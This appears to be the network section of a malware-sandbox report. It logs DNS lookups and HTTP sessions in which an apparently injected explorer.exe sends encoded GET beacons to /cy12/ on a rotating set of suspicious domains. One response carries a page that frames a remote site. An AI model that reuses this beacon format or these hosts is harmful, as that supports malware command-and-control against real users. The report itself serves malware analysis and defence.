Sep 14, 2023 13:30:51.010168076 CEST	49689	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:53.291567087 CEST	49688	443	192.168.2.8	204.79.197.203
Sep 14, 2023 13:30:53.416521072 CEST	49689	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:54.885246038 CEST	49709	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:30:56.572989941 CEST	49767	80	192.168.2.8	172.67.148.175
Sep 14, 2023 13:30:56.741836071 CEST	80	49767	172.67.148.175	192.168.2.8
Sep 14, 2023 13:30:56.741933107 CEST	49767	80	192.168.2.8	172.67.148.175
Sep 14, 2023 13:30:56.742057085 CEST	49767	80	192.168.2.8	172.67.148.175
Sep 14, 2023 13:30:56.910681009 CEST	80	49767	172.67.148.175	192.168.2.8
Sep 14, 2023 13:30:57.060260057 CEST	80	49767	172.67.148.175	192.168.2.8
Sep 14, 2023 13:30:57.060283899 CEST	80	49767	172.67.148.175	192.168.2.8
Sep 14, 2023 13:30:57.060302973 CEST	80	49767	172.67.148.175	192.168.2.8
Sep 14, 2023 13:30:57.060436010 CEST	49767	80	192.168.2.8	172.67.148.175
Sep 14, 2023 13:30:57.060488939 CEST	49767	80	192.168.2.8	172.67.148.175
Sep 14, 2023 13:30:57.060488939 CEST	49767	80	192.168.2.8	172.67.148.175
Sep 14, 2023 13:30:58.104000092 CEST	49688	443	192.168.2.8	204.79.197.203
Sep 14, 2023 13:30:58.228889942 CEST	49689	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:01.432370901 CEST	49719	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:01.744581938 CEST	49719	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:02.353933096 CEST	49719	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:03.557090998 CEST	49719	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:04.494525909 CEST	49709	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:05.963263988 CEST	49719	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:07.713380098 CEST	49688	443	192.168.2.8	204.79.197.203
Sep 14, 2023 13:31:07.838388920 CEST	49689	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:10.775744915 CEST	49719	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:16.527467966 CEST	49774	80	192.168.2.8	104.21.33.108
Sep 14, 2023 13:31:16.696521044 CEST	80	49774	104.21.33.108	192.168.2.8
Sep 14, 2023 13:31:16.696768045 CEST	49774	80	192.168.2.8	104.21.33.108
Sep 14, 2023 13:31:16.696980953 CEST	49774	80	192.168.2.8	104.21.33.108
Sep 14, 2023 13:31:16.865796089 CEST	80	49774	104.21.33.108	192.168.2.8
Sep 14, 2023 13:31:17.197947979 CEST	49774	80	192.168.2.8	104.21.33.108
Sep 14, 2023 13:31:17.236073017 CEST	80	49774	104.21.33.108	192.168.2.8
Sep 14, 2023 13:31:17.236331940 CEST	49774	80	192.168.2.8	104.21.33.108
Sep 14, 2023 13:31:17.236351967 CEST	80	49774	104.21.33.108	192.168.2.8
Sep 14, 2023 13:31:17.236432076 CEST	49774	80	192.168.2.8	104.21.33.108
Sep 14, 2023 13:31:17.366806984 CEST	80	49774	104.21.33.108	192.168.2.8
Sep 14, 2023 13:31:17.367079973 CEST	49774	80	192.168.2.8	104.21.33.108
Sep 14, 2023 13:31:20.385335922 CEST	49719	80	192.168.2.8	192.229.221.95
Sep 14, 2023 13:31:37.405050039 CEST	49776	80	192.168.2.8	142.250.68.83
Sep 14, 2023 13:31:37.622064114 CEST	80	49776	142.250.68.83	192.168.2.8
Sep 14, 2023 13:31:37.622342110 CEST	49776	80	192.168.2.8	142.250.68.83
Sep 14, 2023 13:31:37.622436047 CEST	49776	80	192.168.2.8	142.250.68.83
Sep 14, 2023 13:31:37.839334965 CEST	80	49776	142.250.68.83	192.168.2.8
Sep 14, 2023 13:31:37.896828890 CEST	80	49776	142.250.68.83	192.168.2.8
Sep 14, 2023 13:31:37.896857023 CEST	80	49776	142.250.68.83	192.168.2.8
Sep 14, 2023 13:31:37.897068977 CEST	49776	80	192.168.2.8	142.250.68.83
Sep 14, 2023 13:31:37.897294998 CEST	49776	80	192.168.2.8	142.250.68.83
Sep 14, 2023 13:31:38.115322113 CEST	80	49776	142.250.68.83	192.168.2.8
Sep 14, 2023 13:32:19.002783060 CEST	49777	80	192.168.2.8	43.135.11.21
Sep 14, 2023 13:32:19.321656942 CEST	80	49777	43.135.11.21	192.168.2.8
Sep 14, 2023 13:32:19.321789980 CEST	49777	80	192.168.2.8	43.135.11.21
Sep 14, 2023 13:32:19.321914911 CEST	49777	80	192.168.2.8	43.135.11.21
Sep 14, 2023 13:32:19.640841007 CEST	80	49777	43.135.11.21	192.168.2.8
Sep 14, 2023 13:32:19.641119957 CEST	80	49777	43.135.11.21	192.168.2.8
Sep 14, 2023 13:32:19.641379118 CEST	49777	80	192.168.2.8	43.135.11.21
Sep 14, 2023 13:32:19.641379118 CEST	49777	80	192.168.2.8	43.135.11.21
Sep 14, 2023 13:32:19.960180998 CEST	80	49777	43.135.11.21	192.168.2.8
Sep 14, 2023 13:33:23.028721094 CEST	49778	80	192.168.2.8	43.129.212.107
Sep 14, 2023 13:33:23.354584932 CEST	80	49778	43.129.212.107	192.168.2.8
Sep 14, 2023 13:33:23.354887962 CEST	49778	80	192.168.2.8	43.129.212.107
Sep 14, 2023 13:33:23.354934931 CEST	49778	80	192.168.2.8	43.129.212.107
Sep 14, 2023 13:33:23.680588007 CEST	80	49778	43.129.212.107	192.168.2.8
Sep 14, 2023 13:33:23.681328058 CEST	80	49778	43.129.212.107	192.168.2.8
Sep 14, 2023 13:33:23.681344986 CEST	80	49778	43.129.212.107	192.168.2.8
Sep 14, 2023 13:33:23.681468010 CEST	49778	80	192.168.2.8	43.129.212.107
Sep 14, 2023 13:33:23.681515932 CEST	49778	80	192.168.2.8	43.129.212.107
Sep 14, 2023 13:33:24.007101059 CEST	80	49778	43.129.212.107	192.168.2.8
Sep 14, 2023 13:33:43.345658064 CEST	49779	80	192.168.2.8	198.54.117.215
Sep 14, 2023 13:33:43.526050091 CEST	80	49779	198.54.117.215	192.168.2.8
Sep 14, 2023 13:33:43.526141882 CEST	49779	80	192.168.2.8	198.54.117.215
Sep 14, 2023 13:33:43.526293039 CEST	49779	80	192.168.2.8	198.54.117.215
Sep 14, 2023 13:33:43.706346989 CEST	80	49779	198.54.117.215	192.168.2.8
Sep 14, 2023 13:33:43.707093000 CEST	80	49779	198.54.117.215	192.168.2.8
Sep 14, 2023 13:34:04.265115023 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:05.431832075 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:07.447487116 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:11.462965012 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:11.885580063 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:11.885694981 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:11.885771990 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:12.384984016 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:15.056798935 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:16.562958956 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:16.563534975 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:16.563618898 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:16.563654900 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:16.563662052 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:16.563679934 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:16.563688993 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:16.563700914 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:16.563769102 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:17.082819939 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:17.082884073 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:17.083190918 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:17.083229065 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:19.950186014 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:19.950217009 CEST	80	49782	103.156.178.63	192.168.2.8
Sep 14, 2023 13:34:19.950290918 CEST	49782	80	192.168.2.8	103.156.178.63
Sep 14, 2023 13:34:19.951416969 CEST	49782	80	192.168.2.8	103.156.178.63

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2023 13:30:56.355746984 CEST	53492	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:30:56.571410894 CEST	53	53492	8.8.8.8	192.168.2.8
Sep 14, 2023 13:31:16.276928902 CEST	50226	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:31:16.523967028 CEST	53	50226	8.8.8.8	192.168.2.8
Sep 14, 2023 13:31:37.136138916 CEST	53867	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:31:37.403990030 CEST	53	53867	8.8.8.8	192.168.2.8
Sep 14, 2023 13:31:57.339905024 CEST	50570	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:31:57.590591908 CEST	53	50570	8.8.8.8	192.168.2.8
Sep 14, 2023 13:32:18.723370075 CEST	54603	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:32:19.001454115 CEST	53	54603	8.8.8.8	192.168.2.8
Sep 14, 2023 13:32:39.145018101 CEST	63012	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:32:40.151187897 CEST	63012	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:32:41.151215076 CEST	63012	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:32:41.894490957 CEST	53	63012	8.8.8.8	192.168.2.8
Sep 14, 2023 13:32:42.900940895 CEST	53	63012	8.8.8.8	192.168.2.8
Sep 14, 2023 13:32:43.857745886 CEST	53	63012	8.8.8.8	192.168.2.8
Sep 14, 2023 13:33:22.749968052 CEST	62572	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:33:23.027475119 CEST	53	62572	8.8.8.8	192.168.2.8
Sep 14, 2023 13:33:43.120392084 CEST	55591	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:33:43.344185114 CEST	53	55591	8.8.8.8	192.168.2.8
Sep 14, 2023 13:34:03.796231031 CEST	53370	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:34:04.263946056 CEST	53	53370	8.8.8.8	192.168.2.8
Sep 14, 2023 13:34:24.214651108 CEST	63751	53	192.168.2.8	8.8.8.8
Sep 14, 2023 13:34:24.463191986 CEST	53	63751	8.8.8.8	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 14, 2023 13:30:56.355746984 CEST	192.168.2.8	8.8.8.8	0xfb6d	Standard query (0)	www.modestswimwearshop.com	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:31:16.276928902 CEST	192.168.2.8	8.8.8.8	0xb76a	Standard query (0)	www.com-safe.site	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:31:37.136138916 CEST	192.168.2.8	8.8.8.8	0xdf68	Standard query (0)	www.elfiensclinic.com	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:31:57.339905024 CEST	192.168.2.8	8.8.8.8	0xc8f5	Standard query (0)	www.kslgd.link	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:32:18.723370075 CEST	192.168.2.8	8.8.8.8	0x707a	Standard query (0)	www.ssongg3132.cfd	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:32:39.145018101 CEST	192.168.2.8	8.8.8.8	0x4d23	Standard query (0)	www.hamidconstruction.com	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:32:40.151187897 CEST	192.168.2.8	8.8.8.8	0x4d23	Standard query (0)	www.hamidconstruction.com	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:32:41.151215076 CEST	192.168.2.8	8.8.8.8	0x4d23	Standard query (0)	www.hamidconstruction.com	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:22.749968052 CEST	192.168.2.8	8.8.8.8	0x9c04	Standard query (0)	www.xv1lz.cfd	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:43.120392084 CEST	192.168.2.8	8.8.8.8	0xcd79	Standard query (0)	www.ungravity.dev	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:34:03.796231031 CEST	192.168.2.8	8.8.8.8	0x6ef1	Standard query (0)	www.pmugly.top	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:34:24.214651108 CEST	192.168.2.8	8.8.8.8	0x8dcd	Standard query (0)	www.jhaganjr.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 14, 2023 13:30:56.571410894 CEST	8.8.8.8	192.168.2.8	0xfb6d	No error (0)	www.modestswimwearshop.com		172.67.148.175	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:30:56.571410894 CEST	8.8.8.8	192.168.2.8	0xfb6d	No error (0)	www.modestswimwearshop.com		104.21.87.240	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:31:16.523967028 CEST	8.8.8.8	192.168.2.8	0xb76a	No error (0)	www.com-safe.site		104.21.33.108	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:31:16.523967028 CEST	8.8.8.8	192.168.2.8	0xb76a	No error (0)	www.com-safe.site		172.67.161.223	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:31:37.403990030 CEST	8.8.8.8	192.168.2.8	0xdf68	No error (0)	www.elfiensclinic.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 14, 2023 13:31:37.403990030 CEST	8.8.8.8	192.168.2.8	0xdf68	No error (0)	ghs.googlehosted.com		142.250.68.83	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:31:57.590591908 CEST	8.8.8.8	192.168.2.8	0xc8f5	Name error (3)	www.kslgd.link	none	none	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:32:19.001454115 CEST	8.8.8.8	192.168.2.8	0x707a	No error (0)	www.ssongg3132.cfd		43.135.11.21	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:32:41.894490957 CEST	8.8.8.8	192.168.2.8	0x4d23	Server failure (2)	www.hamidconstruction.com	none	none	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:32:42.900940895 CEST	8.8.8.8	192.168.2.8	0x4d23	Server failure (2)	www.hamidconstruction.com	none	none	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:32:43.857745886 CEST	8.8.8.8	192.168.2.8	0x4d23	Server failure (2)	www.hamidconstruction.com	none	none	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:23.027475119 CEST	8.8.8.8	192.168.2.8	0x9c04	No error (0)	www.xv1lz.cfd		43.129.212.107	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:43.344185114 CEST	8.8.8.8	192.168.2.8	0xcd79	No error (0)	www.ungravity.dev	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 14, 2023 13:33:43.344185114 CEST	8.8.8.8	192.168.2.8	0xcd79	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:43.344185114 CEST	8.8.8.8	192.168.2.8	0xcd79	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:43.344185114 CEST	8.8.8.8	192.168.2.8	0xcd79	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:43.344185114 CEST	8.8.8.8	192.168.2.8	0xcd79	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:43.344185114 CEST	8.8.8.8	192.168.2.8	0xcd79	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:43.344185114 CEST	8.8.8.8	192.168.2.8	0xcd79	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:33:43.344185114 CEST	8.8.8.8	192.168.2.8	0xcd79	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:34:04.263946056 CEST	8.8.8.8	192.168.2.8	0x6ef1	No error (0)	www.pmugly.top		103.156.178.63	A (IP address)	IN (0x0001)	false
Sep 14, 2023 13:34:24.463191986 CEST	8.8.8.8	192.168.2.8	0x8dcd	No error (0)	www.jhaganjr.com	jhaganjr.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 14, 2023 13:34:24.463191986 CEST	8.8.8.8	192.168.2.8	0x8dcd	No error (0)	jhaganjr.com		34.102.136.180	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.modestswimwearshop.com

www.com-safe.site

www.elfiensclinic.com

www.ssongg3132.cfd

www.xv1lz.cfd

www.ungravity.dev

www.pmugly.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.8	49767	172.67.148.175	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2023 13:30:56.742057085 CEST	93	OUT	GET /cy12/?AvCxnt=AWifNKmTatuMNjFWmVUMut82F+R0L3KA9BQ0BXxjmKOLRe1MZCqDC4tODwDaSipR9IdQ&ofut_l=u6Ap0tUPWV20 HTTP/1.1 Host: www.modestswimwearshop.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2023 13:30:57.060260057 CEST	95	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 14 Sep 2023 11:30:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: https://www.modestswimwearshop.com/cy12/?AvCxnt=AWifNKmTatuMNjFWmVUMut82F+R0L3KA9BQ0BXxjmKOLRe1MZCqDC4tODwDaSipR9IdQ&ofut_l=u6Ap0tUPWV20 Strict-Transport-Security: max-age=31536000 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MFa%2Bc4QndPOIReXmIO6u1mn%2FRWDJz6rEr18oJ%2F6L8vk2IxelxRpkd0UeKAtUh4abXlAs4OOaO0unci8CmV5o4WjuNo%2FQgvB07vkbG0mL2xWCLTQEPqRn36Ay8RRcjBZ2DWEthnww%2F%2FNL6%2BG%2FFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80684d011ce92f07-LAX alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Sep 14, 2023 13:30:57.060283899 CEST	95	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.8	49774	104.21.33.108	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2023 13:31:16.696980953 CEST	124	OUT	GET /cy12/?AvCxnt=BBvyp039BsiOmjXcA5Ca/67av2dim7wwRTlzlMYtyQde9IIm1L0K7Q1DYQ9I6Egj/rZO&ofut_l=u6Ap0tUPWV20 HTTP/1.1 Host: www.com-safe.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2023 13:31:17.236073017 CEST	125	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Sep 2023 11:31:17 GMT Content-Type: application/json; charset=utf-8 Content-Length: 173 Connection: close vary: Origin access-control-allow-origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W3Z5F1k%2FZU6wc71M3fs38qYq6eYHjNJSGcnGPLLjhwKhDNUNQeNSchyWV6osogeSdeBx5ku%2BMOn0sGqMDkdprAPR39XUOLLa0gt45LtZbLA0j5GP4T81GHfnnRIoP31CV%2Fm0%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80684d7dcfc128f4-LAX alt-svc: h3=":443"; ma=86400 Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 52 6f 75 74 65 20 47 45 54 3a 2f 63 79 31 32 2f 3f 41 76 43 78 6e 74 3d 42 42 76 79 70 30 33 39 42 73 69 4f 6d 6a 58 63 41 35 43 61 2f 36 37 61 76 32 64 69 6d 37 77 77 52 54 6c 7a 6c 4d 59 74 79 51 64 65 39 49 49 6d 31 4c 30 4b 37 51 31 44 59 51 39 49 36 45 67 6a 2f 72 5a 4f 26 6f 66 75 74 5f 6c 3d 75 36 41 70 30 74 55 50 57 56 32 30 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 7d Data Ascii: {"message":"Route GET:/cy12/?AvCxnt=BBvyp039BsiOmjXcA5Ca/67av2dim7wwRTlzlMYtyQde9IIm1L0K7Q1DYQ9I6Egj/rZO&ofut_l=u6Ap0tUPWV20 not found","error":"Not Found","statusCode":404}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.8	49776	142.250.68.83	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2023 13:31:37.622436047 CEST	157	OUT	GET /cy12/?AvCxnt=S+XgLZqtN5ZrcTzEH0nKIqDU9JEn3YyIEzS4ZMIyK+eZCzdhhaAxeSNoAuyrfH+cd4vM&ofut_l=u6Ap0tUPWV20 HTTP/1.1 Host: www.elfiensclinic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2023 13:31:37.896828890 CEST	158	IN	HTTP/1.1 301 Moved Permanently Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 14 Sep 2023 11:31:37 GMT Location: https://www.elfiensclinic.com/cy12/?AvCxnt=S+XgLZqtN5ZrcTzEH0nKIqDU9JEn3YyIEzS4ZMIyK+eZCzdhhaAxeSNoAuyrfH+cd4vM&ofut_l=u6Ap0tUPWV20 Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.8	49777	43.135.11.21	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2023 13:32:19.321914911 CEST	160	OUT	GET /cy12/?AvCxnt=3ygVfBIa0HGiFlfKyaMrueuajYyskdaeFhTv94TMZpq88FBTarjLVZY/KKLUVTjfM/60&ofut_l=u6Ap0tUPWV20 HTTP/1.1 Host: www.ssongg3132.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.8	49778	43.129.212.107	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2023 13:33:23.354934931 CEST	162	OUT	GET /cy12/?AvCxnt=7lHQpdK6TkflL8F8jBh9ujCCw+Z4C/llZEJLsHo9QOc6XtJTCIRu+iorXSY5XXoPERW4&ofut_l=u6Ap0tUPWV20 HTTP/1.1 Host: www.xv1lz.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2023 13:33:23.681328058 CEST	163	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 14 Sep 2023 11:33:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 33 30 31 0d 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 32 33 65 35 32 66 38 61 32 66 33 34 36 35 30 66 34 37 34 63 64 64 37 64 61 37 34 61 62 66 63 38 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e8 bd bd e5 85 a5 e4 b8 ad e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 20 30 3b 6d 61 72 67 69 6e 3a 20 30 7d 0a 20 20 20 20 20 20 20 20 23 77 72 61 70 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 0a 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 7b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 75 31 2e 6e 6a 38 71 6f 62 2e 63 6f 6d 3a 38 38 2f 33 34 2f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 301<script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?23e52f8a2f34650f474cdd7da74abfc8"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"> <title></title> <style> html,body,iframe{width: 100%;height: 100%;padding: 0;margin: 0} #wrap{width: 100%;height: 100%;} iframe{border: none;} </style></head><body><div id="wrap"> <iframe src="https://iu1.nj8qob.com:88/34/"></iframe></div></body></html>0

